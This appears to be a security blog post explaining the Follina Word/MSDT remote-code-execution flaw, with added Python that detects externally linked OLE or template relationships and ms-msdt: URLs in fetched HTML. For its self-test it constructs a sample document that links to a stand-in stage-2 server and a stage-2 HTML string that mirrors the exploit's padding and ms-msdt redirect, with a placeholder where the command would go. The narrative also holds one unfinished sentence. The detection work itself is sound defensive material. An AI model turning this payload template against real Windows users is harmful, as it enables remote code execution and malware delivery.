Just so happens that you are already working through a long queue of urgent emails, so you think, “What’s one more?” and smile. What you don’t know is that the last urgent email you received was sent by an attacker. This attacker is weeks into a complex Business Email Compromise (BEC) campaign. Their campaign involves compromising business accounts – like your M365 account – and then sending malware to the contacts in those accounts’ contact list.
The contacts are completely unaware that the sender’s account has been compromised. You read the attacker’s email, thinking it’s from a trusted contact. The email instructs you to open the attached Word document. Instead of opening it, you just hover your mouse over the attachment to get a preview of the document. That’s all it took to infect your device. Simply previewing the maliciously crafted Word document was enough to begin exploiting native Microsoft logic; no macros are involved, and in the RTF variant of the document the Windows Explorer preview pane alone is enough to trigger it. Excuse me…what happened? Ransomware strikes without notice. A small piece of software commonly
called a dropper was downloaded using social engineering. The vulnerability, reported on Twitter by security researcher Kevin Beaumont and dubbed “Follina” (the abused component is the Microsoft Support Diagnostic Tool, MSDT, reached through the ms-msdt: URL protocol), is tracked as CVE-2022-30190. It is a remote code execution vulnerability in Microsoft Windows that is reached through a native Microsoft Word feature: the document links to an external (remote) template or OLE object, Word fetches that HTML resource, and the HTML hands the ms-msdt: protocol handler a command that MSDT then runs, even with macros disabled. Security researcher John Hammond shows the power of Follina in his GitHub proof of concept. Droppers often use logic bombs to trigger the download of the main malware payload. Once the dropper is on a device it waits for the designated condition(s) to be met; this could be as simple as a specific date and time, or a combination of conditions. After the dropper executes.
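As an added illustration (not part of the original post, and not Kevin Beaumont’s or John Hammond’s code), the Python below shows what a defender can check for on both sides of the trick described above: on the document side, an externally linked OLE object or attached template whose relationship target is an http(s) URL inside the .docx package; on the fetched-content side, an ms-msdt: URL carrying a PowerShell $( ) subexpression in its parameters. The sample document and stage-2 HTML are constructed here; the documentation IP address and the PLACEHOLDER command are assumptions, not a working payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace and the two relationship types a Follina-style
# document abuses: an externally linked OLE object or an attached (remote) template.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
SUSPICIOUS_REL_TYPES = {OLE_REL, TEMPLATE_REL}

# Constructed sample relationship part (assumption: 198.51.100.10 is a documentation
# address standing in for the attacker's server).
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="http://198.51.100.10:8080/stage2.html" TargetMode="External"/>
</Relationships>"""

# Constructed stand-in for the HTML stage 2 would serve: a script that redirects the
# browser control inside Word to the ms-msdt: handler. PLACEHOLDER is an assumption,
# not a real command.
SAMPLE_STAGE2_HTML = (
    "<!doctype html><html><body><script>\n"
    "// " + "A" * 4096 + "\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_BrowseForFile=$(PLACEHOLDER)\\"";\n'
    "</script></body></html>"
)
BENIGN_HTML = "<html><body><script>window.location.href = 'https://example.com/';</script></body></html>"


def build_sample_docx() -> bytes:
    """Assemble a minimal .docx (a zip of XML parts) carrying the sample relationships."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes):
    """Return (part, Id, Type, Target) for every relationship with TargetMode="External"
    found in any .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Id"), rel.get("Type"), rel.get("Target")))
    return found


def follina_indicators(docx_bytes: bytes):
    """Return the external OLE/template relationships whose target is an http(s) URL.
    A legitimate document almost never links its OLE objects or template over HTTP."""
    hits = []
    for part, rid, rtype, target in external_relationships(docx_bytes):
        if rtype in SUSPICIOUS_REL_TYPES and re.match(r"^https?://", target or "", re.I):
            hits.append({"part": part, "id": rid, "type": rtype.rsplit("/", 1)[-1], "target": target})
    return hits


MSDT_URI = re.compile(r"ms-msdt:", re.I)
CMD_SUBST = re.compile(r"\$\(")  # PowerShell subexpression inside an MSDT parameter


def msdt_indicator(html: str):
    """Classify fetched HTML: 'high' if it carries an ms-msdt: URL with a $( ) subexpression
    in its parameters, 'medium' if only the ms-msdt: scheme appears, None if neither."""
    if not MSDT_URI.search(html):
        return None
    return "high" if CMD_SUBST.search(html) else "medium"


if __name__ == "__main__":
    for hit in follina_indicators(build_sample_docx()):
        print(f"external {hit['type']} in {hit['part']} ({hit['id']}) -> {hit['target']}")
    print("stage-2 HTML verdict:", msdt_indicator(SAMPLE_STAGE2_HTML))
```

The relationship check is the cheap, offline part and can run on every inbound attachment; the HTML check is for whatever a sandbox or proxy actually retrieves from the linked URL. One caveat: this parser only understands the zipped .docx layout, so the RTF variant (which embeds the object link differently and is the one the Explorer preview pane fires on) needs a separate RTF check.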